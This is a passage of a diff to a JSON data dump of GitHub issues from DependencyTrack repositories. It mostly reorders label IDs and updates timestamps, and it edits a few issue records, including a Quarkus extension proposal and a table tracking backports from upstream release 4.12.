"updated_at": "2024-02-12T20:00:12Z", + "updated_at": "2024-09-22T10:05:19Z", "author": 1242, "repository": 1388, "assignees": [], "labels": [ - 846, 847, - 851 + 846 ] } }, @@ -164744,8 +164754,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, 851, + 845, 854, 855 ] @@ -164897,9 +164907,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 846, - 847, - 852 + 847 ] } }, @@ -165049,9 +165059,9 @@ "repository": 1388, "assignees": [], "labels": [ - 845, + 853, 852, - 853 + 845 ] } }, @@ -165111,8 +165121,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 850 + 850, + 845 ] } }, @@ -165746,8 +165756,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 857 + 857, + 845 ] } }, @@ -165808,9 +165818,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 846, - 847, - 852 + 847 ] } }, @@ -165871,8 +165881,8 @@ "repository": 1388, "assignees": [], "labels": [ - 847, - 854 + 854, + 847 ] } }, @@ -166023,9 +166033,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 846, - 847, - 852 + 847 ] } }, @@ -166541,9 +166551,9 @@ "repository": 1388, "assignees": [], "labels": [ - 847, 850, - 851 + 851, + 847 ] } }, @@ -166668,10 +166678,10 @@ "repository": 1388, "assignees": [], "labels": [ - 847, 852, 853, - 854 + 854, + 847 ] } }, @@ -166731,9 +166741,9 @@ "repository": 1388, "assignees": [], "labels": [ + 859, 844, - 847, - 859 + 847 ] } }, @@ -166763,9 +166773,9 @@ "repository": 1388, "assignees": [], "labels": [ - 847, + 859, 854, - 859 + 847 ] } }, @@ -166918,9 +166928,9 @@ "repository": 1388, "assignees": [], "labels": [ + 859, 844, - 847, - 859 + 847 ] } }, @@ -167188,10 +167198,10 @@ "repository": 1388, "assignees": [], "labels": [ - 846, - 847, 852, - 853 + 853, + 846, + 847 ] } }, @@ -167286,8 +167296,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 853 + 853, + 845 ] } }, @@ -167317,10 +167327,10 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 846, + 853, 852, - 853 + 845, + 846 ] } }, @@ -167350,10 +167360,10 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 846, + 853, 852, - 853 + 845, + 846 ] } }, @@ -167383,10 +167393,10 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 846, + 853, 852, - 853 + 845, + 846 ] } }, @@ -167416,10 +167426,10 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 846, + 858, 852, - 858 + 845, + 846 ] } }, @@ -167449,10 +167459,10 @@ "repository": 1388, "assignees": [], "labels": [ - 847, 852, 853, - 854 + 854, + 847 ] } }, @@ -167603,9 +167613,9 @@ "repository": 1388, "assignees": [], "labels": [ - 847, 853, - 854 + 854, + 847 ] } }, @@ -167705,7 +167715,7 @@ "pk": 5542, "fields": { "nest_created_at": "2024-09-12T02:09:56.889Z", - "nest_updated_at": "2024-09-18T19:07:20.528Z", + "nest_updated_at": "2024-09-21T07:17:38.945Z", "node_id": "I_kwDODPFPBc6VvP01", "title": "Warn user about recursive project deletion when deleting a parent project", "body": "### Current Behavior\n\nWhen a user deletes a parent project in DT, all child projects are also deleted without explicit warning or confirmation. This may lead to unintended data loss if the user is not aware of the recursive deletion behavior.\n\n### Proposed Behavior\n\nWhen a user attempts to delete a parent project in DT, a warning message should be displayed indicating that all child projects will also be deleted. This warning should prompt the user to confirm the deletion.\n\n### Checklist\n\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/dependency-track/blob/master/CONTRIBUTING.md#filing-issues)\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/frontend/issues) for whether this enhancement was already requested", @@ -167786,10 +167796,10 @@ "repository": 1389, "assignees": [], "labels": [ + 864, 861, 862, - 863, - 864 + 863 ] } }, @@ -167826,7 +167836,7 @@ "pk": 5546, "fields": { "nest_created_at": "2024-09-12T02:10:28.646Z", - "nest_updated_at": "2024-09-18T19:07:25.394Z", + "nest_updated_at": "2024-09-22T19:41:20.899Z", "node_id": "I_kwDOEFeRS86VSmBU", "title": "fetch is not defined on 3.1.0", "body": "We updated to 3.1.0 and now we have the following error:\r\n::error::fetch is not defined", @@ -167882,7 +167892,7 @@ "pk": 5548, "fields": { "nest_created_at": "2024-09-12T02:10:39.453Z", - "nest_updated_at": "2024-09-18T19:07:29.790Z", + "nest_updated_at": "2024-09-20T18:27:32.200Z", "node_id": "I_kwDOLKvFdc6GfJkE", "title": "Allow extraLabels to be set", "body": "Hi,\r\n\r\nI'm looking forward to using the Helm charts to deploy DT on my K8s cluster. But my company is usings admission controllers that will verify the existence of particular labels. Since they're not part of the produced templates, I cannot test any deployments. For this reason I'd like to ask for the introduction of `extraLabels` values key that can accept multiple K/V entries.", @@ -167996,8 +168006,8 @@ "repository": 1391, "assignees": [], "labels": [ - 871, - 872 + 872, + 871 ] } }, @@ -168061,10 +168071,10 @@ "repository": 1391, "assignees": [], "labels": [ - 871, 873, 874, - 876 + 876, + 871 ] } }, @@ -168094,10 +168104,10 @@ "repository": 1391, "assignees": [], "labels": [ - 871, 872, 874, - 877 + 877, + 871 ] } }, @@ -168161,9 +168171,9 @@ "repository": 1391, "assignees": [], "labels": [ - 871, 874, - 879 + 879, + 871 ] } }, @@ -168193,10 +168203,10 @@ "repository": 1391, "assignees": [], "labels": [ - 874, - 879, 880, - 881 + 881, + 874, + 879 ] } }, @@ -168226,10 +168236,10 @@ "repository": 1391, "assignees": [], "labels": [ + 883, 873, - 875, 882, - 883 + 875 ] } }, @@ -168292,8 +168302,8 @@ "repository": 1391, "assignees": [], "labels": [ - 871, - 874 + 874, + 871 ] } }, @@ -168324,8 +168334,8 @@ "assignees": [], "labels": [ 874, - 879, - 884 + 884, + 879 ] } }, @@ -168355,10 +168365,10 @@ "repository": 1391, "assignees": [], "labels": [ - 871, 873, 874, - 875 + 875, + 871 ] } }, @@ -168454,8 +168464,8 @@ "labels": [ 873, 874, - 882, - 886 + 886, + 882 ] } }, @@ -168866,9 +168876,9 @@ "repository": 1391, "assignees": [], "labels": [ + 896, 873, 874, - 896, 897 ] } @@ -168937,8 +168947,8 @@ "labels": [ 873, 874, - 881, - 884 + 884, + 881 ] } }, @@ -169097,8 +169107,8 @@ ], "labels": [ 873, - 875, 890, + 875, 894 ] } @@ -169129,8 +169139,8 @@ "repository": 1391, "assignees": [], "labels": [ - 871, - 890 + 890, + 871 ] } }, @@ -169197,11 +169207,11 @@ "repository": 1391, "assignees": [], "labels": [ + 898, 878, 887, 890, - 894, - 898 + 894 ] } }, @@ -169259,9 +169269,9 @@ "repository": 1391, "assignees": [], "labels": [ - 878, 890, 894, + 878, 895 ] } @@ -169329,11 +169339,11 @@ "repository": 1391, "assignees": [], "labels": [ + 899, 872, 873, 887, - 894, - 899 + 894 ] } }, @@ -169429,11 +169439,11 @@ "repository": 1391, "assignees": [], "labels": [ + 899, 873, 875, 884, - 894, - 899 + 894 ] } }, @@ -169463,11 +169473,11 @@ "repository": 1391, "assignees": [], "labels": [ + 899, 873, 874, 884, - 887, - 899 + 887 ] } }, @@ -169564,10 +169574,10 @@ "repository": 1391, "assignees": [], "labels": [ - 871, - 887, 888, - 894 + 887, + 894, + 871 ] } }, @@ -169633,11 +169643,11 @@ 1248 ], "labels": [ + 899, 875, 878, 890, - 894, - 899 + 894 ] } }, @@ -169667,11 +169677,11 @@ "repository": 1391, "assignees": [], "labels": [ + 900, 873, 875, 884, - 894, - 900 + 894 ] } }, @@ -169768,8 +169778,8 @@ "labels": [ 875, 884, - 894, - 901 + 901, + 894 ] } }, @@ -169799,9 +169809,9 @@ "repository": 1391, "assignees": [], "labels": [ + 888, 874, - 875, - 888 + 875 ] } }, @@ -169831,10 +169841,10 @@ "repository": 1391, "assignees": [], "labels": [ - 875, 888, - 894, - 902 + 902, + 875, + 894 ] } }, @@ -169864,12 +169874,12 @@ "repository": 1391, "assignees": [], "labels": [ + 898, + 903, 873, 874, 875, - 884, - 898, - 903 + 884 ] } }, @@ -169934,10 +169944,10 @@ "repository": 1391, "assignees": [], "labels": [ + 888, 873, 874, - 875, - 888 + 875 ] } }, @@ -169979,27 +169989,28 @@ "pk": 5611, "fields": { "nest_created_at": "2024-09-12T02:13:54.314Z", - "nest_updated_at": "2024-09-12T02:13:54.315Z", + "nest_updated_at": "2024-09-20T18:27:39.581Z", "node_id": "I_kwDOIGVE5s6Gw96M", "title": "Investigate feasibility of creating a Quarkus extension for DataNucleus", "body": "### Current Behavior\n\nHaving to deal with multiple tech stacks (Alpine for API server, Quarkus for all other services) poses some challenges. It would be great if we could eventually converge them all to at least use the same framework.\r\n\r\nHaving all of the services use the same tech stack *could* potentially enable us to structure the project as modular monolith, such that users can decide if they prefer to deploy a single application, or multiple.\r\n\r\nThe API server largely uses standard Java EE concepts and as such would be relatively easy to port to Quarkus. The only outlier being the persistence framework, DataNucleus. There is no Quarkus extension for it (https://github.com/quarkusio/quarkus/issues/1908). However, it might be feasible to create one.\n\n### Proposed Behavior\n\nInvestigate how feasible it is to create a Quarkus extension for DataNucleus: https://quarkus.io/guides/writing-extensions\n\n### Checklist\n\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/hyades/blob/main/CONTRIBUTING.md#filing-issues)\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/hyades/issues) for whether this enhancement was already requested", "summary": "Investigate the feasibility of developing a Quarkus extension for DataNucleus to streamline the tech stack by enabling all services, including the API server, to utilize a unified framework. Assess the compatibility of DataNucleus with Quarkus and explore guidelines for writing extensions as outlined in the Quarkus documentation. Aim to facilitate the potential transition to a modular monolith architecture, allowing users the flexibility to deploy either a single application or multiple services.", "hint": "To investigate the feasibility of creating a Quarkus extension for DataNucleus, follow these steps:\n\n1. **Research Quarkus Extension Architecture**:\n - Review the official Quarkus documentation on writing extensions to understand the necessary components, lifecycle, and integration points.\n\n2. **Analyze DataNucleus**:\n - Examine DataNucleus's architecture, features, and configuration requirements. Understand how it operates, particularly regarding persistence and data access.\n\n3. **Identify Requirements**:\n - List the functionalities of DataNucleus that need to be supported in the Quarkus extension, such as transaction management, configuration, and lifecycle events.\n\n4. **Check Compatibility**:\n - Investigate if DataNucleus can be integrated with Quarkus's dependency injection and lifecycle management. Identify potential conflicts or challenges.\n\n5. **Explore Existing Extensions**:\n - Study existing Quarkus extensions to see how they are structured and to identify best practices that can be applied to the DataNucleus extension.\n\n6. **Prototype Basic Functionality**:\n - Create a minimal prototype of the extension that includes basic DataNucleus functionality. Focus on configuration and initialization within the Quarkus lifecycle.\n\n7. **Evaluate Performance**:\n - Conduct performance tests to assess how the extension interacts with Quarkus and DataNucleus. Identify any bottlenecks or areas for optimization.\n\n8. **Gather Community Feedback**:\n - Share your findings and prototype with the Quarkus and DataNucleus communities. Gather feedback to identify any overlooked considerations or improvements.\n\n9. **Document Challenges and Solutions**:\n - Maintain thorough documentation of the challenges faced during the investigation and the solutions implemented. This will be valuable for future reference and for others attempting similar integrations.\n\n10. **Create a Roadmap for Development**:\n - Based on your findings, outline a roadmap for full extension development, including milestones for features, testing, and community engagement.\n\nBy following these steps, you can systematically investigate the feasibility of creating a Quarkus extension for DataNucleus.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "not_planned", "url": "https://github.com/DependencyTrack/hyades/issues/1231", "number": 1231, "sequence_id": 2260983436, "is_locked": false, "lock_reason": "", "comments_count": 1, - "closed_at": null, + "closed_at": "2024-09-19T10:36:20Z", "created_at": "2024-04-24T10:41:46Z", - "updated_at": "2024-04-24T13:40:14Z", + "updated_at": "2024-09-19T10:36:20Z", "author": 1248, "repository": 1391, "assignees": [], "labels": [ + 1137, 874, 876, 884, @@ -170239,11 +170250,11 @@ 2509 ], "labels": [ + 904, 873, 876, 882, - 894, - 904 + 894 ] } }, @@ -170252,10 +170263,10 @@ "pk": 5619, "fields": { "nest_created_at": "2024-09-12T02:14:16.660Z", - "nest_updated_at": "2024-09-18T19:07:37.982Z", + "nest_updated_at": "2024-09-22T19:41:39.751Z", "node_id": "I_kwDOIGVE5s6NQ01N", "title": "Port changes from upstream DT release 4.12.x", - "body": "### Current Behavior\r\n\r\nv4.12 of vanilla Dependency-Track is being worked on. We need to port the relevant changes to Hyades.\r\n\r\n> [!NOTE]\r\n> This issue is being created early, in order to keep track of the v4.12.x changes we have already ported prior to an official v4.12 release.\r\n\r\nFor reference, changes from v4.11.x were ported here: https://github.com/DependencyTrack/hyades/issues/1190\r\n\r\n### Proposed Behavior\r\n\r\n| Issue / PR | Type | Description | Backported | Backport PR |\r\n|:--------|:----------|:-------|:-------|:--------|\r\n| https://github.com/DependencyTrack/dependency-track/pull/3682 | Enhancement | Raise baseline Java version to 21 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/628 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3711 | Enhancement | Bump Alpine to `2.2.6-SNAPSHOT` | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/815 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3713 | Enhancement | Remove workarounds for `#2677` | N/A, workaround was never in place for Hyades | - |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3722 | Enhancement | Remove legacy BomUploadProcessingTask | N/A, legacy task does not exist in Hyades | - |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3724 | Enhancement | Gracefully handle NotSortableExceptions | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/832 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3726 | Enhancement | Migrate from Swagger v2 to OpenAPI v3 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/785 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3728 | Enhancement | Improve OpenAPI v3 integration | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/820 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3730 | Enhancement | Migrate to Jakarta EE 10 and Jetty 12 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/785 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3731 | Bugfix | Fix OpenAPI types of UNIX timestamp fields | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/833 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3746, https://github.com/DependencyTrack/frontend/pull/930 | Enhancement | Add EPSS conditions to policies | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/834, https://github.com/DependencyTrack/hyades-frontend/pull/114 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3819 | Enhancement | Bump CWE dictionary to v4.14 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/842, https://github.com/DependencyTrack/hyades/pull/1445 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3846 | Enhancement | Bump SPDX license list to v3.24.0 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/844 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3869 | Enhancement | Improve performance of findings retrieval | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/757 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3889 | Bugfix | Fix NPE when querying component metadata for projects without findings | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/765 |\r\n| https://github.com/DependencyTrack/frontend/pull/927 | Enhancement | Raise baseline node version to 20 | ✅ | https://github.com/DependencyTrack/hyades-frontend/pull/86 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3990 | Enhancement | Log warning when dependency graph is missing the root node | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/795 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3982 | Enhancement | Ensure no unique constraint violation for ProjectMetadata | TODO | TODO |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3958 | BugFix | Fix JDOUserException when multiple licenses match a component's license name | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/806 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3960, https://github.com/DependencyTrack/dependency-track/pull/3843 | Enhancement | Fix missing projectTags parameter for POST /v1/bom endpoint | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/814 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3691, https://github.com/DependencyTrack/frontend/pull/872 | Enhancement | Add active Field To Project Versions + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/813, https://github.com/DependencyTrack/hyades-frontend/pull/106 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3924 | Enhancement | Add REST endpoints to tag and untag policies in bulk + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/830, https://github.com/DependencyTrack/hyades-frontend/pull/113 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3711 | Enhancement | Replace manual transaction commits with callInTransaction | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/815 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3894 | Enhancement | Add REST endpoints for bulk tagging & un-tagging of projects | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/821 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3881, https://github.com/DependencyTrack/frontend/pull/922, https://github.com/DependencyTrack/dependency-track/pull/3887 | Enhancement | Add REST endpoints for tag retrieval + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/819, https://github.com/DependencyTrack/hyades-frontend/pull/107 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3896 | Enhancement | Add REST endpoint for tag deletion | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/824, https://github.com/DependencyTrack/hyades-frontend/pull/112 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4026 | BugFix | Fix project link for new vulnerable dependency for email | ✅ | https://github.com/DependencyTrack/hyades/pull/1440, https://github.com/DependencyTrack/hyades-apiserver/pull/835 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3761 | Enhancement | Search component by group | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/836 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3796 | Enhancement | Add Notification For `BOM_VALIDATION_FAILED` | ✅ | https://github.com/DependencyTrack/hyades/pull/1443, https://github.com/DependencyTrack/hyades-apiserver/pull/839, https://github.com/DependencyTrack/hyades-frontend/pull/116 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3915 | Bugfix | Set license name instead of ID when using custom license | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/845 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3948 | Bugfix | Fix vex export returning invalid CycloneDX | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/852 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4020 | Bugfix | Fix validation error when multiple namespace declarations are present | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/874 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3969 | Enhancement | Replace author with authors | TODO | https://github.com/DependencyTrack/hyades-apiserver/pull/866 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4104 | Bugfix | Bump DataNucleus to 6.0.8 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/882 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4147, https://github.com/DependencyTrack/dependency-track/pull/4146 | Bugfix | Handle existing duplicate component properties, Handle empty component and service names | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/911 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4131 | Enhancement | Customizable login page + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/913, https://github.com/DependencyTrack/hyades-frontend/pull/133 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4109 | Enhancement | Support inclusion/exclusion of projects from BOM validation with tags + frontend | TODO | https://github.com/DependencyTrack/hyades-apiserver/pull/914, https://github.com/DependencyTrack/hyades-frontend/pull/134 |\r\n\r\n### Checklist\r\n\r\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/hyades/blob/main/CONTRIBUTING.md#filing-issues)\r\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/hyades/issues) for whether this enhancement was already requested", + "body": "### Current Behavior\r\n\r\nv4.12 of vanilla Dependency-Track is being worked on. We need to port the relevant changes to Hyades.\r\n\r\n> [!NOTE]\r\n> This issue is being created early, in order to keep track of the v4.12.x changes we have already ported prior to an official v4.12 release.\r\n\r\nFor reference, changes from v4.11.x were ported here: https://github.com/DependencyTrack/hyades/issues/1190\r\n\r\n### Proposed Behavior\r\n\r\n| Issue / PR | Type | Description | Backported | Backport PR |\r\n|:--------|:----------|:-------|:-------|:--------|\r\n| https://github.com/DependencyTrack/dependency-track/pull/3682 | Enhancement | Raise baseline Java version to 21 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/628 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3711 | Enhancement | Bump Alpine to `2.2.6-SNAPSHOT` | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/815 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3713 | Enhancement | Remove workarounds for `#2677` | N/A, workaround was never in place for Hyades | - |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3722 | Enhancement | Remove legacy BomUploadProcessingTask | N/A, legacy task does not exist in Hyades | - |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3724 | Enhancement | Gracefully handle NotSortableExceptions | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/832 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3726 | Enhancement | Migrate from Swagger v2 to OpenAPI v3 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/785 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3728 | Enhancement | Improve OpenAPI v3 integration | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/820 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3730 | Enhancement | Migrate to Jakarta EE 10 and Jetty 12 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/785 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3731 | Bugfix | Fix OpenAPI types of UNIX timestamp fields | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/833 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3746, https://github.com/DependencyTrack/frontend/pull/930 | Enhancement | Add EPSS conditions to policies | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/834, https://github.com/DependencyTrack/hyades-frontend/pull/114 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3819 | Enhancement | Bump CWE dictionary to v4.14 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/842, https://github.com/DependencyTrack/hyades/pull/1445 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3846 | Enhancement | Bump SPDX license list to v3.24.0 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/844 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3869 | Enhancement | Improve performance of findings retrieval | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/757 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3889 | Bugfix | Fix NPE when querying component metadata for projects without findings | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/765 |\r\n| https://github.com/DependencyTrack/frontend/pull/927 | Enhancement | Raise baseline node version to 20 | ✅ | https://github.com/DependencyTrack/hyades-frontend/pull/86 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3990 | Enhancement | Log warning when dependency graph is missing the root node | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/795 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3982 | Enhancement | Ensure no unique constraint violation for ProjectMetadata | TODO | TODO |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3958 | BugFix | Fix JDOUserException when multiple licenses match a component's license name | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/806 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3960, https://github.com/DependencyTrack/dependency-track/pull/3843 | Enhancement | Fix missing projectTags parameter for POST /v1/bom endpoint | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/814 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3691, https://github.com/DependencyTrack/frontend/pull/872 | Enhancement | Add active Field To Project Versions + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/813, https://github.com/DependencyTrack/hyades-frontend/pull/106 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3924 | Enhancement | Add REST endpoints to tag and untag policies in bulk + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/830, https://github.com/DependencyTrack/hyades-frontend/pull/113 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3711 | Enhancement | Replace manual transaction commits with callInTransaction | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/815 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3894 | Enhancement | Add REST endpoints for bulk tagging & un-tagging of projects | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/821 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3881, https://github.com/DependencyTrack/frontend/pull/922, https://github.com/DependencyTrack/dependency-track/pull/3887 | Enhancement | Add REST endpoints for tag retrieval + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/819, https://github.com/DependencyTrack/hyades-frontend/pull/107 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3896 | Enhancement | Add REST endpoint for tag deletion | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/824, https://github.com/DependencyTrack/hyades-frontend/pull/112 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4026 | BugFix | Fix project link for new vulnerable dependency for email | ✅ | https://github.com/DependencyTrack/hyades/pull/1440, https://github.com/DependencyTrack/hyades-apiserver/pull/835 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3761 | Enhancement | Search component by group | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/836 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3796 | Enhancement | Add Notification For `BOM_VALIDATION_FAILED` | ✅ | https://github.com/DependencyTrack/hyades/pull/1443, https://github.com/DependencyTrack/hyades-apiserver/pull/839, https://github.com/DependencyTrack/hyades-frontend/pull/116 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3915 | Bugfix | Set license name instead of ID when using custom license | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/845 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3948 | Bugfix | Fix vex export returning invalid CycloneDX | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/852 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4020 | Bugfix | Fix validation error when multiple namespace declarations are present | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/874 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/3969 | Enhancement | Replace author with authors | TODO | https://github.com/DependencyTrack/hyades-apiserver/pull/866 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4104 | Bugfix | Bump DataNucleus to 6.0.8 | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/882 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4147, https://github.com/DependencyTrack/dependency-track/pull/4146 | Bugfix | Handle existing duplicate component properties, Handle empty component and service names | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/911 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4131 | Enhancement | Customizable login page + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/913, https://github.com/DependencyTrack/hyades-frontend/pull/133 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4109 | Enhancement | Support inclusion/exclusion of projects from BOM validation with tags + frontend | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/914, https://github.com/DependencyTrack/hyades-frontend/pull/134 |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4031 | Enhancement | Add tag support for notifications, and REST endpoints for tagging & untagging notifications in bulk + frontend | TODO | @sahibamittal |\r\n| https://github.com/DependencyTrack/dependency-track/pull/4165 | Bugfix | Fix infinite recursion during policy condition serialization | ✅ | https://github.com/DependencyTrack/hyades-apiserver/pull/920 |\r\n\r\n### Checklist\r\n\r\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/hyades/blob/main/CONTRIBUTING.md#filing-issues)\r\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/hyades/issues) for whether this enhancement was already requested", "summary": "Port the relevant changes from upstream Dependency-Track release v4.12.x to Hyades, tracking modifications in real-time prior to the official release. Implement enhancements such as raising the baseline Java version to 21, migrating to Jakarta EE 10, and improving OpenAPI v3 integration, alongside fixing bugs related to OpenAPI types and validation errors. Ensure that all backported changes are documented with corresponding pull requests for comprehensive tracking and integration.", "hint": "To approach the problem of porting relevant changes from the upstream Dependency-Track release 4.12.x to Hyades, follow these steps:\n\n1. **Gather Information**: Review the existing changes in the upstream 4.12.x release, focusing on the proposed changes listed in the issue. Familiarize yourself with the context and significance of each change.\n\n2. **Identify Relevant Changes**: Determine which changes are applicable to Hyades by comparing the functionality of Hyades with that of Dependency-Track. Note which changes can be directly ported and which ones may not be relevant (as indicated in the \"Backported\" column).\n\n3. **Create a Porting Plan**: Develop a clear plan outlining the specific changes to be implemented, including enhancements and bug fixes, and organize them in priority order based on their impact and complexity.\n\n4. **Set Up Development Environment**: Ensure that you have a proper development environment for Hyades set up, including the necessary tools and dependencies to build and test the application.\n\n5. **Implement Changes**: Begin porting the identified changes one at a time. For each change, replicate the necessary code modifications from the upstream repository into the Hyades codebase.\n\n6. **Test Each Change**: After implementing each change, run existing test suites and create new tests as needed to ensure that the new functionality works as expected and does not introduce regression errors.\n\n7. **Code Review**: Submit the changes for code review by peers or 